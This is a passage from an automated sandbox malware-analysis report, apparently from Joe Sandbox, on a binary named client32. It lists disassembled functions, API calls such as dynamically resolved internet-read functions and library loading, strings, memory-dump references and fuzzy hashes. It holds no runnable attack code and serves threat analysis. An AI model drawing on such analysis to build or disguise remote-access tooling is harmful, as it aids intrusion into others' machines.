                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 2181554437-3415836059
                                                                                                                                                    • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                                                                                    • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                                                                                    • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                                                                                    • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                                                                                    Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick
                                                                                                                                                    • String ID: General$TicklePeriod
                                                                                                                                                    • API String ID: 536389180-1546705386
                                                                                                                                                    • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                                                                    • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                                                                                    • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                                                                    • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                                                                                    Function 6CA90C40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
                                                                                                                                                      • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 6CA90D9C
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 6CA90DB1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: DATA$NAME
                                                                                                                                                    • API String ID: 1338273076-4000142801
                                                                                                                                                    • Opcode ID: a2dc08d47f98f0640ab0a6d1dbb324135d22b178374bb1bbe6ede2ad68686a6f
                                                                                                                                                    • Instruction ID: 65f56cd3b82dc085f1f0e7a0fffd753f0978376b6f23d06b1fb843274e1980b9
                                                                                                                                                    • Opcode Fuzzy Hash: a2dc08d47f98f0640ab0a6d1dbb324135d22b178374bb1bbe6ede2ad68686a6f
                                                                                                                                                    • Instruction Fuzzy Hash: 2E411AB1D112499FDB04CFE5D981AEEFBF4FB08204F14452EE416A7640EB345A49CB51
                                                                                                                                                    Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                                                                                                    • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110774FE
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2755825785-2830328467
                                                                                                                                                    • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                                                                                    • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                                                                                                    • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                                                                                    • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                                                                                                    Function 6CA86CAD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 6CA86D0A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 6CA86D72
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                    • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                                    • API String ID: 190572456-1434219782
                                                                                                                                                    • Opcode ID: 495d9d464fb4d690c56c46f7ca0d25682a93c5ebbe6d8809b1b706e9285b50ec
                                                                                                                                                    • Instruction ID: 77cf094f4f67f7aeb281d9e1241688bf5f278c33191b0f8dfb0291c316364d55
                                                                                                                                                    • Opcode Fuzzy Hash: 495d9d464fb4d690c56c46f7ca0d25682a93c5ebbe6d8809b1b706e9285b50ec
                                                                                                                                                    • Instruction Fuzzy Hash: 62313772A011A99FEB20DF68CCC1AD9B7F4FF09309B2449A9E588D7700D670A9C5CF10
                                                                                                                                                    Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 110D1378
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                                                    • API String ID: 1528188558-323366856
                                                                                                                                                    • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                                                                    • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                                                                                    • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                                                                    • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                                                                                    Function 6CA86CE7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 6CA86D0A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 6CA86D72
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                    • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                                    • API String ID: 190572456-1434219782
                                                                                                                                                    • Opcode ID: d347ccf639f755d837883e5313e002ac04fc31d9a1dbdf35517d4ccfe0e247ce
                                                                                                                                                    • Instruction ID: 132a038dd22eca38ae4da95a227773a31da955030990863d634b712fc0561aff
                                                                                                                                                    • Opcode Fuzzy Hash: d347ccf639f755d837883e5313e002ac04fc31d9a1dbdf35517d4ccfe0e247ce
                                                                                                                                                    • Instruction Fuzzy Hash: D1215E75A111AA9FEB21DF54C880AD8B7B4FB48309F2549ADE988D7700D6705DC5CF10
                                                                                                                                                    Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                                                                                      • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                                                                                      • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                                                                                      • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                                                                                      • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                                                                                                    • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                    • String ID: hhctrl.ocx
                                                                                                                                                    • API String ID: 1060647816-2298675154
                                                                                                                                                    • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                                                                                    • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                                                                                    • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                                                                                    • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                                                                                    Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 11005981
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 3704029381-2830328467
                                                                                                                                                    • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                                                                                    • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                                                                                    • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                                                                                    • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                                                                                    Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,1EF76653), ref: 1105D59E
                                                                                                                                                    • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,1EF76653), ref: 1105D5A8
                                                                                                                                                    Strings
                                                                                                                                                    • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                    • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                                                                                    • API String ID: 3094578987-11999416
